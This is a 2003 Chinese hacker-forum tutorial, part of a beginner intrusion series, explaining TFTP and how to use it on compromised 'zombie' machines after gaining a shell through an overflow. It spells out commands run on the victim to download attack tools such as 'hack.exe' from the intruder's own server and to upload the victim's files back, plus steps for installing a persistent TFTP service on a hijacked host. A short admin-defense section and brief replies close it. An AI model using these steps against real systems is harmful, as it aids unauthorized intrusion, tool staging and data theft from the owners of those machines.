论坛: 菜鸟乐园 标题: 专题祥解2--tftp的应用 复制本贴地址    
作者: iqst [iqst]    论坛用户   登录
[iqst的黑客入门系列教程]--专题祥解2--tftp的应用
author: iqst
from: http://ccbirds.yeah.net
retain above info to transport

目录
一  前言
二 tftp协议
三 tftp软件
四 tftp在入侵中的作用
五 tftp使用指南
六 tftp使用注意事项
七 在肉鸡上安装tftp服务
八 安全解决方案
九 结束语


一  前言


总听人说用tftp来向肉鸡传文件,到底tftp是什么?怎么用?它有什么优缺点?在使用中要注意哪些问题?带着以上这一串疑问,让我们来好好认识一下tftp.


二 tftp协议


TFTP(Trivial File Transfer Protocol 简单文件传输协议)是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。TFTP运行在UDP协议之上,提供不可靠的数据报传输服务,不提供存取授权与认证机制,使用超时和重传方式来保证数据的到达。
tftp与ftp的比较:
1 tftp提供不可靠的无连接的数据报传输服务,因此可能会丢失数据;ftp提供可靠的有连接的数据报传输服务
2 tftp不提供存取授权与认证机制,使用时不需要输入用户名和密码,有guest权限即可;ftp提供存取授权与认证机制
3 tftp运行于udp协议之上;ftp运行tcp协议之上
4 tftp使用(udp)69端口;ftp使用(tcp)21端口
5 由于功能简单,tftp件比ftp软件小的多


三 tftp软件


tftp软件分为服务器端和客户端。我们首先来看服务器端。
我们经常使用的tftp服务器端软件有Cisco Tftp Server和tftpd32.exe,你可以在各大网站上下载到它们。双击运行后,你的电脑就成为了一个tftp服务器而无需其他设置,服务器软件所在目录就是tftp服务器的默认根目录,你需要把希望传到肉鸡上的工具放在这个根目录下,而你从肉鸡上取下的文件,也会自动放到这个根目录下。我个人推荐使用Cisco Tftp Server作为服务器软件,因为它有日志功能,进度显示,并且比tftpd32稳定。

tftp客户端软件是win2000系统自带的tftp.exe,你可以在system32下找到它。使用时直接在cmd中输入tftp命令即可。


四 tftp在入侵中的作用


我们以往传输文件都利用ipc$管道,但一旦ipc$被屏蔽,而且没有其他共享目录,我们应该怎么传送文件呢?又假如我们通过溢出获得了对方的cmd,有没有比copy命令更便捷的文件传输方式呢?这时候最好的答案便是使用tftp。无论是在肉鸡上安装tftp服务还是将自己的电脑建成tftp服务器,我们都不再需要考虑ipc$存在与否,也不需要任何用户名与口令,只需几步简单的操作就可以实现文件的传输。因此对tftp的熟练应用是每一个入侵者都应该掌握的。


五 tftp使用指南


当我们成功溢出且夺到对方的cmd后,如果对方屏蔽了ipc$管道,在这种情况下我们一般选择使用tftp来传输文件,然而如何使用tftp命令是最令新手们头痛的问题了,因为tftp命令与我们以往的命令有些不同,容易让人摸不着头脑,不过没关系,跟我来,包教包会!

假设这样一个环境:有A,B两台机器,在A上运行了tftp服务器端软件,如Cisco Tftp Server(运行即可,无需设置),且拥有B机器的一个shell,比如溢出得到的cmd等;在B上有tftp客户端软件,即tftp.exe(系统自带),A,B都在公网上,那么理论上我们可以用tftp服务在A,B之间传送文件。一般情况下,A机器就是你自己的机器,B机器就是你溢出的机器。好了,下面让我们来看tftp命令:

如果你想把文件从A传送到B(实质上是从服务器A下载文件),那么可以在shell中输入如下命令:
tftp -i ip get hack.exe c:\hack.exe
其中,ip为A的公网ip,hack.exe为需要传送的文件,c:\hack.exe为目地路径和文件名,
注意:
1.命令中目的路径和程序名不要省略,但目的文件名与源文件名可以不一致
2.程序名中的文件扩展名不要省略
3.需要传送的文件要与tftp服务器端软件在同一目录下
4.文件上传后自动变为只读属性,若需要删除,先用attrib -r去掉只读属性
5.目的文件夹下不能有同名只读属性的文件,同名非只读属性文件将自动覆盖为只读属性

如果你想把文件从B传送到A(实质是上传文件到服务器A),那么可以在shell中输入如下命令:
tftp -i ip put hack.exe
其中,ip为A的公网ip,hack.exe为文件名,
注意:
1.命令中不需要目的路径,因为传送的文件将会被放到A上tftp服务器端软件所在的目录下
2.tftp程序会在B机器的当前目录下搜索hack.exe,因此命令中无需添加hack.exe的源路径
3.A上根文件夹下不能有同名只读属性的文件


(本系列教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区 http://ccbirds.yeah.net)


六 tftp使用注意事项


1.tftp服务器端必须在本机上先运行起来,使本机充当tftp服务器的角色
2.tftp服务器软件在文件传输过程中不得关闭,直至文件传送完毕
3.要传到肉鸡的文件必须和tftp服务器软件在同一个目录下;文件的默认下载位置也是这个目录
4.可以在对方的任何命令行中使用tftp命令,如浏览器中对方的cmd(U漏洞);SQLEXEC的command输入行等位置
5.tftp会自动将传到肉鸡上的文件变为只读属性,但不允许存在同名只读属性的文件
6.tftp对从肉鸡下载的文件采用直接覆盖不提示的方式,但根目录下不允许存在同名只读属性的文件
7.用tftp传送文件可能会丢失文件,重传即可,但不宜传输大文件
8.tftp服务不能实现与局域网内的文件互传,因为网内机器没有公网ip,tftp无法识别网内ip


七 在肉鸡上安装tftp服务


如果你需要与肉鸡频繁的传输文件,你可以在肉鸡上安装tftp服务,使它成为一台tftp服务器,不过我个人并不建议这么做,首先容易被管理员发现,其次效果也不好,还不如装个ftp服务呢。下面是我在网上找来的一段安装教程,修改了一下,大家随便看看吧。

1 我们首先要找到系统中的tftp服务软件tftpd.exe(2000 server版以上才有),一般我们可以在%systemroot%\system32\dllcache目录下找到该文件

2 接下来我们用Windows 2000下的Resource Kits中的一个工具instsrv来创建tftp服务,instsrv的用法如下,当然,你也可以用srvinstw来实现,它使GUI方式的。

C:\>instsrv
Installs and removes system services from NT

INSTSRV <service name> (<exe location> | REMOVE)
[-a <Account Name>] [-p <Account Password>]

Install service example:

INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo

Remove service example:

INSTSRV MyService REMOVE

3 安装服务,注意:该服务默认为自动启动
C:\>instsrv "tftp services" c:\winnt\system32\dllcache\tftpd.exe
The service was successfuly added!

Make sure that you go into the Control Panel and use
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.

4 启动服务
C:\>net start "tftp services"
tftp 服务正在启动 .
tftp 服务已经启动成功。

注意,如果你上传文件,系统会在%systemdrive%自动创建一个名为tftproot的目录,我们上传和提供下载的文件都放在这里。


八 安全解决方案


如果你是网络管理员,那么在绝大多数情况下,你应该禁止你的机器使用tftp,以避免入侵者向机器传送文件,具体方法欲望之翼的那篇文章已经说得比较清楚了,如果你没有看过那篇文章,我再简单说一下。注意:tftp.exe是系统保护文件,无法删除。

1 使用cacls命令来限制用户对程序的访问,如想禁止guest对tftp进行访问,可以输入下面的命令:
c:\>cacls.exe c:\winnt\system32\tftp.exe /d guest

2 更改端口配置文件
打开%systemroot%\system32\drivers\etc下的service文件,将tftp 69/udp 替换为0/udp即可


九 结束语


好了,关于tftp的使用就说这么多了,不知道大家看懂了没有。由于这学期作业特别多,所以没写出什么好的菜鸟文章给大家,真是抱歉,假期我会更努力的,88了先。


完成时间:iqst-2003/11/28 20:16 http://ccbirds.yeah.net
更新时间:   
[iqst的黑客入门系列教程]--专题祥解2--tftp的应用


地主 发表时间: 11/28 20:15

回复: mumast [mumast]   论坛用户   登录
dinging

B1层 发表时间: 12/02 15:45

回复: bridex [bridex]   论坛用户   登录
晕@_@
没看明白.我太菜了.


B2层 发表时间: 12/02 16:10

回复: iqst [iqst]   论坛用户   登录
没看懂?

B3层 发表时间: 12/06 10:43

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号